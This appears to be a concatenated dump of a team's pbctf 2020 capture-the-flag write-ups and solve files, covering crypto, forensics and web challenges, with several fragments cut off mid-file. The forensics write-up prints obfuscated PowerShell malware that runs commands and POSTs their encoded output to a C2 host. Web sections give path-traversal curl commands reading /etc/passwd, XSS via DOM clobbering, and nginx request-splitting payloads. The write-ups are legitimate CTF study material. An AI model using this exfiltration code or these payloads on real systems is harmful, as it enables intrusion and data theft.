2020/crypto/strong_cipher/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | import re 3 | def gf2(src1, src2): 4 | ret = 0 5 | for i in range(0, 8): 6 | if src2 & (1 << i): 7 | ret = ret ^ (src1 << i) 8 | for i in range(14, 7, -1): 9 | p = 0x11B << (i - 8) 10 | if ret & (1 << i): 11 | ret = ret ^ p 12 | return ret 13 | 14 | ct = open("ciphertext", "rb").read() 15 | 16 | key_len = 12 17 | ct_len = len(ct) 18 | pt = bytearray(ct_len) 19 | key = 0 20 | 21 | for j in range(key_len): 22 | max_printable = -1 23 | for k in range(256): 24 | printable = 0 25 | for i in range(j, ct_len, key_len): 26 | if (32 <= gf2(ord(ct[i]), k) <= 126): 27 | printable += 1 28 | if printable > max_printable: 29 | key = k 30 | max_printable = printable 31 | for i in range(j, ct_len, key_len): 32 | pt[i] = gf2(ord(ct[i]), key) 33 | 34 | print(re.findall(r'pbctf{.*}', pt)[0]) 35 | -------------------------------------------------------------------------------- /2020/pbctf 2020/misc/gcombo/README.md: -------------------------------------------------------------------------------- 1 | Looking at the source of the google form, it essentially gives us a directed graph. 2 | This was parsed and is present in parsed.py, solve.py uses breadth first search to find a path upto node 751651474. 3 | The path generated from the script can be used on the google form which asks us for a password, which can be found in the source. 4 | We can use the password `s3cuR3_p1n_id_2_3v3ry0ne` from the source, this will show us that flag is in the form `pbctf{
14 |
15 | By decoding the hex in the image we get
16 | ```
17 | Here's my link: https://pastebin.com/j6Xd9GNM <-- Hehehehe! See if you can RE me
18 | ```
19 | By visiting the pastebin we get the flag
20 |
21 | # FLAG
22 | `pbctf{3nc0d1ng_w1th_ass3mbly}`
23 |
--------------------------------------------------------------------------------
/2020/pbctf 2020/misc/not_stego/profile.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Super-Guesser/ctf/21ad5acdc39be59af80cc43412912ec662d0e695/2020/pbctf 2020/misc/not_stego/profile.png
--------------------------------------------------------------------------------
/2020/pbctf 2020/misc/vaccine_stealer/README.md:
--------------------------------------------------------------------------------
1 | # Challenge
2 |
3 | * **Points**: 470
4 | * **Solves**: 2
5 | * **Files**: [memory.7z](https://drive.google.com/file/d/10XZD5S2FCdPyugSvoIkWD8s3pH20hQS2/view)
6 |
7 | ```
8 | An employee's PC at a COVID-19 vaccine manufacturer was infected with a malware. According to this employee, a strange window popped up while he was formatting his PC and installing some files. Analyze memory dumps and find traces of the malware.
9 |
10 | (1): Filename of the malicious executable whose execution finished at last
11 | (2): Filename of the executable that ran (1)
12 | (3): URL of C2 server that received victim's data (except http(s)://)
13 | Obtain all flag information and enter it in the form of pbctf{(1)_(2)_(3)}
14 | ```
15 |
16 | # Solution
17 |
18 | Regular [volatility](https://github.com/volatilityfoundation/volatility) and "dumb" `strings`/`grep` runs were futile at the beginning as there were loads of junk inside. After spending 3-4 hours without a proper "lead", decided to do some PCAP carving. Already prepared for some manual approach, as did in some previous similar occasions, but nevertheless gave [CapLoader](https://www.netresec.com/index.ashx?page=CapLoader) a chance. While inside of the results there were no "clear" C&C attempts, found an interesting domain `mft.fw` inside one of `Set-Cookie` headers from CloudFlare HTTP response. By visiting the same domain, found out that same domain is the personal domain of challenge author. As in similar challenges, decided to take a "shoot" and do some more `grep`-ing with that same domain on the provided memory dump. The rest is history.
19 |
20 | So, first "obvious" malicious excerpt contacting the candidate C&C URL `mft.pw/ccc.php` (Note: **Answers the Question (3)**) found was:
21 |
22 | ```ps
23 | s`eT-V`A`Riab`lE Diq ( [typE]('sY'+'S'+'tEM.'+'tExT'+'.'+'EnCOdiNg') ); Set-`VARI`A`B`le ('Car'+'u1') ( [TyPe]('ConveR'+'t') ) ;${i`N`V`OkEcO`MmaND} = ((('cm'+'d'+'.exe')+' /'+'c '+'C'+':'+('HaSP'+'r')+('o'+'gr')+'a'+('m'+'Dat')+'aH'+('aSnt'+'user')+'.p'+('ol'+' TC'+'P ')+('172.30'+'.1.0'+'/24 33'+'8')+('95'+'12 /'+'B'+'a')+('nne'+'r'))."REPL`A`cE"(([chaR]72+[chaR]97+[chaR]83),[STRInG][chaR]92));
24 | ${CMdout`p`Ut} = $(i`NVoK`e-eXPRE`ss`I`on ${I`NvOk`E`cOMMaND});
25 | ${B`yT`es} = ( v`ARiA`BLE dIQ -VALu )::"U`NI`coDe"."g`etBYTES"(${cm`DOu`TPUt});
26 | ${eN`Co`dEd} = ( I`TEM ('VarI'+'a'+'B'+'LE'+':Caru1') ).valuE::"ToB`AS`E`64striNG"(${b`Yt`es});
27 | ${poSTP`A`R`AmS} = @{"D`ATa"=${e`N`cOded}};
28 | i`N`VOkE-WEb`REQuESt -Uri ('mft.pw'+'/ccc'+'c.ph'+'p') -Method ('POS'+'T') -Body ${p`o`sTpaRaMs};
29 | ```
30 |
31 | By doing some more `grep`-ing found that the original (obfuscated) excerpt which produced the upper PowerShell excerpt was:
32 |
33 | ```ps
34 | nEW-ObjEcT sySTEm.iO.sTreaMReAdER( ( nEW-ObjEcT SystEm.iO.CompreSsiOn.DEfLATEstREam([IO.meMoryStream] [CoNVeRT]::fROMbASe64StRinG('NVJdb5tAEHyv1P9wQpYAuZDaTpvEVqRi+5Sgmo/Axa0VRdoLXBMUmyMGu7Es//fuQvoAN7e7Nzua3RqUcJbgQVLIJ1hzNi/eGLMYe2gOFX+0zHpl9s0Uv4YHbnu8CzwI8nIW5UX4bNqM2RPGUtU4sPQSH+mmsFbIY87kFit3A6ohVnGIFbLOdLlXCdFhAlOT3rGAEJYQvfIsgmAjw/mJXTPLssxsg3U59VTvyrT7JjvDS8bwN8NvbPYt81amMeItpi1TI3omaErK0fO5bNr7LQVkWjYkqlZtkVtRUK8xxAQxxqylGVwM3dFX6jtw6TgbnrPRCMFlm75i3xAPhq2aqUnNKFyWqhNiu0bC4wV6kXHDsh6yF5k8Xgz7Hbi6+ACXI/vLQyoSv7x5/EgNbXvy+VPvOAtyvWuggvuGvOhZaNFS/wTlqN9xwqGuwQddst7Rh3AfvQKHLAoCsq4jmMJBgKrpMbm/By8pcDQLzlju3zFn6S12zB6PjXsIfcj0XBmu8Qyqma4ETw2rd8w2MI92IGKU0HGqEGYacp7/Z2U+CB7gqJdy67c2dHYsOA0H598N33b3cr3j2EzoKXgpiv1+XjfbIryhRk+wakhq16TSqYhpKcHbpNTox9GYgyekcY0KcFGyKFf56YTF7drg1ji/+BMk/G7H04Y599sCFW3+NG71l0aXZRntjFu94FGhHidQzYvOsSiOaLsFxaY6P6CbFWioRSUTGdSnyT8=' ) , [IO.coMPressION.cOMPresSiOnmOde]::dEcOMPresS)), [TexT.ENcODInG]::AsCIi)).ReaDToeNd();;
35 | ```
36 |
37 | Deobfuscating the first excerpt, we came to the following command, which clearly indicates the location of the malicious executable at location `C:\ProgramData\ntuser.pol` (Note: **Answers the Question (1)**):
38 |
39 | ```
40 | cmd.exe /c C:\ProgramData\ntuser.pol TCP 172.30.1.0/24 3389512 /Banner
41 | ```
42 |
43 | So, now, only thing which is missing from the "puzzle" is the answer to the question: `(2): Filename of the executable that ran (1)`. This one was slightly tricky to find because A) this information is not available through standard `volatility` runs as that same executable was not running during the memory snapshot; and B) there is no standard `volatility` plugin to get the list of executables being run at OS startup.
44 |
45 | Nevertheless, while later found that I could (easier) do the 3rd party plugin [volatility-autoruns](https://github.com/tomchop/volatility-autoruns), based the "last yard" on manually finding suspicious executable names got by inspecting `strings` and `strings -el` run results. The most promising was the following *Task Scheduler XML* entry, found by `grep`-ing for folder `C:\ProgramData` used in case of `ntuser.pol`, running the executable `C:\ProgramData\WindowsPolicyUpdate.cmd` (Note: **Answers the Question (2)**):
46 |
47 | ```xml
48 | 7 | Like for bruteforcing `xx` in following path:
`https://xsp.chal.perfect.blue/data/xx/`, we have to add 256 iframes with following format.
8 | ```html 9 | 11 | ``` 12 | 3. Iterate through iframes and find one which it's window's length is more than `0`, the right one has our bruteforced path part in it's id. 13 | 14 | 4. include the bruteforced script with a defined `notes_callback` function to get results. 15 | 16 | 17 | -------------------------------------------------------------------------------- /2020/pbctf 2020/web/XSP/bruteforce.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |
7 |
8 |
9 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/2020/pbctf 2020/web/apoche1/README.md:
--------------------------------------------------------------------------------
1 | * Visit http://34.68.159.75:37173/robots.txt
2 | * We see there is a /secret directory. Visit that and there are few notes.
3 | * some Fuzzing reveals there is LFI at `http://34.68.159.75:37173/secret/../../../../../../etc/passwd`
4 | * curl --path-as-is "http://34.68.159.75:37173/secret/../../../../../../etc/passwd"
5 | * open using curl/burp as browser will path normalize
6 | * visit `http://34.68.159.75:37173/secret/../../../../../../proc/self/exe` and you will get the flag
7 | * curl --path-as-is "http://34.68.159.75:41521/secret/../../../../../proc/self/exe" 2>&1 | strings | grep pbctf
8 |
9 | pbctf{n0t_re4lly_apache_ap0che!}
10 |
--------------------------------------------------------------------------------
/2020/pbctf 2020/web/ikea-name-generator/README.md:
--------------------------------------------------------------------------------
1 | What's your IKEA name? Mine is SORPOÄNGEN.
2 |
3 | http://ikea-name-generator.chal.perfect.blue/
4 |
5 | By: corb3nik
6 |
7 | ---
8 |
9 | 1.Break JSON Syntax by adding a new line (%0a) to make CONFIG undefined
10 | `http://ikea-name-generator.chal.perfect.blue/?name=renwa%0a`
11 |
12 | 2.Using DOM Clobbering fake CONFIG
13 | `
21 | Last comment nickname:
23 |
24 |
43 |
44 | ```
45 |
46 | xss bot automatically goes to this page. The response of `last_nickname` is controllable by us but there is a check on that endpoint
47 | that checks if the remote ip is not locahost.
48 | The first challenge is to bypass this mechanism
49 | ## First part - Cache poisoning
50 |
51 | There is a cache poisoning vulnerablity that is due to the misconfiguration of nginx.
52 |
53 | ```
54 | proxy_cache_key "$language$request_uri";
55 | ```
56 |
57 | `$request_uri` is `request_path+request_querystring` and `$language` is the `Accept-language` header of the request.
58 |
59 | The requester ip address is not inside the cache key so we can use this vulnerablity to bypass the `last_nickname` endpoint protection.
60 |
61 | ## Second part - Weird http-js-challenge nginx module
62 |
63 | This bug was quite fun to spot and exploit.
64 | We actually found this bug by luck and somebody sent a POST request to somewhere and saw two responses in body.
65 | After looking into this behavior, We concluded that the module doesn't clean the request body from the request buffer and we can get http request splitting primitives with it.
66 |
67 | ```
68 | GET / HTTP/1.1\r\n
69 | Host: example.org\r\n
70 | Content-Length: 30\r\n
71 | \r\n
72 | GET /hack HTTP/1.1\r\n
73 | example:
74 | ```
75 |
76 | When the nginx module receives the above request, it doesn't read the body so the next request that it handles is the `GET /hack` request.
77 | The splitted request is not fully sent (The last two CRLFs are not sent) so the next request that nginx receives goes inside that request.
78 |
79 | That means that next request that the module handles is
80 | ```
81 | GET /hack HTTP/1.1\r\n
82 | example: GET / HTTP/1.1\r\n
83 | Host: example.org\r\n
84 | Header: header\r\n
85 | \r\n
86 | ```
87 |
88 | More details from the author:
89 | > The bug in the js_challange module is here:
90 | >
91 | > https://github.com/simon987/ngx_http_js_challenge_module/blob/master/ngx_http_js_challenge.c#L240
92 | >
93 | > there is a missing ngx_http_discard_request_body(r)
94 | >
95 | > So this module doesn't clean the request body
96 | >
97 | > It is only exploitable with specific nginx configuration (keepalive connection on proxy_pass)
98 |
99 | ## Third part - Chaining the bugs
100 |
101 | The following payload contains an infinite loop that keeps evaluating the `/last_nickname` endpoint response.
102 |
103 | ```html
104 | Maybe loading...
22 |